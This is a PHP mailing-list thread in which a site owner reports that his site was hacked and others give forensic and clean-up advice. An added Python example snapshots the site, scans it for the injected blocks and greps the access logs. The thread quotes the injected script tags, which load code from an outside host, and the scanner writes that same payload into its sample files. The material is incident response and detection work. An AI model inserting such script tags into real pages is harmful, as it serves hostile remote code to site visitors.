On 10/7/2014 9:08 PM, Richard wrote:
------------ Original Message ------------
Date: Tuesday, October 07, 2014 20:36:00 -0400
From: Jim Giner <jim.giner@xxxxxxxxxxxxxxxxxx>
To: php-general@xxxxxxxxxxxxx
Subject: Re: Re: hacked!!
On 10/7/2014 6:10 PM, Kevin Kinsey wrote:
On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote:
If anyone is interested here is what is being inserted into
random html and php files:
<!--f853a8--><script type="text/javascript"
src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138"></script><!--/f853a8-->
and
<!--83b914--><script type="text/javascript"
src="http://n/mytdhzzp.php?id=9625233"></script><!--/83b914-->
Hi Jim,
Thanks for being open and sharing this information. I'm sorry I'm
late to the party.
IANAE on security, but I have some experience with forensics and
server administration as well as identifying attack vectors in
PHP and ColdFusion and mitigating them.
Off the top of my head, this *looks* a tad like code injection
via an unknown vector. By chance, are these code snippets
attached to the *end* of the files that contain them?
Keep copies of the infected files, with accurate timestamps for
the date of last modification.
If you can obtain server access logs, it would be prudent to
search them (with a "find" tool, like Unix 'grep' or the search
features of your favorite editor) for the strings in the HTML
comment sections, portions of the suspect URLs, etc.
Your web host will perhaps listen well if you pay them well, and
the less you pay them, the less likely they are to be concerned.
However, I would open a ticket and advise them of what has
occurred. Ask them some questions, like what kind of security
software is installed on their shared server, whether or not they
monitor network traffic for suspect packets, *whether or not the
server is vulnerable to "bash shell shock" (CVE-2014-6271 and
CVE-2014-7169) (also known as "bashdoor")*.
If your website has *no* third-party software built in, that's
good news, up to a point. It may indeed be that your code is
"tough enough" and the hole was not in your code. Given the
severity of ShellShock and the fact that your server contains
other peoples' sites as well, which may have 3rd party packages
that are vulnerable, I might think rather seriously about using a
VM, as others have suggested, in the future if at all feasible.
Hope this helps,
Kevin Kinsey
I'm afraid I can't keep the info you mentioned since I already
cleaned this up. Yes - some of the problem was with large chunks
of code at the bottom of a couple of index.php files. Most of it
was a small commented out piece of <script> code that called some
site in Germany. I have a utility to scan every file in my domain
that helped me find all the occurrences (about 30) which I then
updated after cleaning them.
Thanks for the tips tho.
When dealing with a hacked site it is always best to snapshot the
whole site - not limited to the document root - making certain to
preserve everything including file dates/times, permissions,
ownerships, etc., and capturing any hidden directories or files (a
common method for leaving backdoors) - before cleaning anything up.
That way there is something that can be reviewed at a later stage.
If you haven't been able to pinpoint the source of the intrusion, I
would suggest using your utility to scan your site on a very regular
basis.
- Richard
And that I am doing. And I am learning.
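A scanner of the kind this thread talks about, added here as an example; it is not code from the thread and not Jim's own utility. It follows Richard's advice first (snapshot the whole site with permissions, timestamps and hidden directories preserved, before touching anything), then walks the tree for the `<!--tag--><script src=...></script><!--/tag-->` blocks Jim quoted, recording each file's modification time and mode, and finally derives strings to grep for in the access logs as Kevin suggests. The file names, the hidden `.cache` directory, the `demo()` helper and the log lines are constructed for the example; the injected block reuses the first snippet Jim posted.

```python
# Added example, not code from the thread: snapshot, scan, and derive log indicators.
import os
import re
import stat
import tarfile
import tempfile
from dataclasses import dataclass

# Shape of the injected block quoted in the thread: an HTML comment carrying a
# 6-hex-digit tag, one external <script src=...>, and the matching closing comment.
INJECT_RE = re.compile(
    r'<!--(?P<tag>[0-9a-f]{6})-->\s*'
    r'<script[^>]*\bsrc=["\'](?P<src>[^"\']+)["\'][^>]*>\s*</script>\s*'
    r'<!--/(?P=tag)-->',
    re.IGNORECASE,
)


@dataclass
class Finding:
    path: str
    tag: str
    src: str
    mtime: float  # last-modification time, captured before any clean-up
    mode: str     # permission bits as "ls -l" shows them, e.g. "-rw-r--r--"


def snapshot(root, archive):
    """Archive `root` before cleaning: tarfile keeps mode, mtime and owner and
    includes dot-files, so hidden backdoors survive for later review.
    Returns the archived file names so the caller can check nothing was skipped."""
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(root, arcname="site")
    with tarfile.open(archive) as tar:
        return sorted(m.name for m in tar.getmembers() if m.isfile())


def scan_file(path):
    """Return one Finding per injected block in `path` (empty list if clean)."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")  # never raises on odd bytes
    st = os.lstat(path)
    return [Finding(path, m.group("tag").lower(), m.group("src"),
                    st.st_mtime, stat.filemode(st.st_mode))
            for m in INJECT_RE.finditer(text)]


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk `root`, hidden directories included; pass exts=None to scan every file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if exts is None or name.lower().endswith(exts):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def indicators(findings):
    """Strings worth grepping for in access logs: the comment tags, the host
    and the script file name from each injected URL (query string dropped)."""
    needles = set()
    for f in findings:
        needles.add(f.tag)
        hostpath = f.src.split("://", 1)[-1].split("?", 1)[0]
        needles.add(hostpath.split("/", 1)[0])    # host
        needles.add(hostpath.rsplit("/", 1)[-1])  # script file name
    return needles


def grep_log(lines, needles):
    """Return the log lines containing any indicator (case-insensitive)."""
    low = [n.lower() for n in needles]
    return [ln for ln in lines if any(n in ln.lower() for n in low)]


def build_sample_site():
    """Constructed document root: a clean file, an infected index.php, and a
    hidden directory holding a second infected page."""
    root = tempfile.mkdtemp(prefix="site-")
    payload = ('<!--f853a8--><script type="text/javascript" '
               'src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138">'
               '</script><!--/f853a8-->')
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n<!--f853a8--> a plain comment, no script tag\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php include 'header.php'; ?>\n<p>content</p>\n" + payload + "\n")
    os.makedirs(os.path.join(root, ".cache"))
    with open(os.path.join(root, ".cache", "old.html"), "w") as fh:
        fh.write("<html><body>" + payload + "</body></html>\n")
    return root


SAMPLE_LOG = [  # constructed access-log lines in common log format
    '203.0.113.5 - - [03/Oct/2014:19:40:01 -0400] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Oct/2014:19:41:17 -0400] "POST /uploads/x.php HTTP/1.1" 200 33',
    '203.0.113.5 - - [03/Oct/2014:19:42:00 -0400] "GET /mytdhzzp.php?id=9625138 HTTP/1.1" 404 0',
]


def demo():
    """Snapshot first, scan second, then search the sample log for indicators."""
    root = build_sample_site()
    members = snapshot(root, root + ".tgz")  # archive sits beside, not inside, root
    findings = scan_tree(root)
    hits = grep_log(SAMPLE_LOG, indicators(findings))
    return members, findings, hits


if __name__ == "__main__":
    archived, found, log_hits = demo()
    print("archived:", ", ".join(archived))
    for f in found:
        print(f"{f.mode} {f.mtime:.0f} {f.path}: tag={f.tag} src={f.src}")
    for ln in log_hits:
        print("LOG:", ln)
```

On a real site you would call `snapshot` on the account root rather than only the document root, point `scan_tree` at the same tree (with `exts=None` to include files of any extension), and feed `grep_log` the lines of the host's access log; the `mtime` recorded in each finding is the value to compare against those log timestamps.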
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php